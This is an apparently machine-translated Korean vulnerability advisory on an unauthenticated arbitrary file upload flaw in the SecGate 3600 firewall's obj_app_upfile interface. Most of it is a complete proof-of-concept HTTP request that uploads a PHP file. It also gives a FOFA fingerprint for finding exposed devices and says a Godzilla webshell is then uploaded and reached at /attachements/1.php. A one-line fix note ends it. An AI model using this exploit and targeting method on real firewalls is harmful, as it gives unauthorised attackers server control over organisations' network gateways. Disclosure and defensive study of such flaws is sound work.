0x01 제품 소개
Wangshen SecGate3600 차세대 초고속 방화벽(NSG 시리즈)은 Netshen의 성숙하고 안정적인 3세대 SecOS 운영 체제를 기반으로 합니다. 전문 방화벽, VPN 및 IPS에서의 제품 경험 성능 차세대 방화벽은 사업자, 정부, 군대, 교육 기관, 대기업 및 중소기업의 인터넷 출구를 위해 특별히 설계되었습니다. DDoS 공격, VPN, 콘텐츠 필터링, IPS, 대역폭 관리, 사용자 인증 및 기타 보안 기술 올인원 능동 방어 지능형 보안 게이트웨이.
0x02 취약점 개요
SecGate 3600 방화벽의 obj_app_upfile 인터페이스에 임의 파일 업로드 취약점이 존재하며, 권한이 없는 공격자가 이 취약점을 통해 임의 파일을 업로드하여 서버 권한을 획득할 수 있습니다.
0x03 영향 범위
Netsun SecGate 3600 방화벽
0x04 반복 환경
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
0x05 취약점 재현
PoC
POST /?g=obj_app_upfile HTTP/1.1
Host: your-ip
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 574
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="MAX_FILE_SIZE"
10000000
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: text/plain
马子
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="submit_post"
obj_app_upfile
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="__hash__"
0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundaryJpMyThWnAxbcBBQc--고질라 업로드
URL 확인
https://your-ip/attachements/1.php연결을 시도
0x06 수리 제안
인터넷의 노출된 표면을 닫고 파일 업로드 모듈에 대한 강력한 인증을 설정합니다.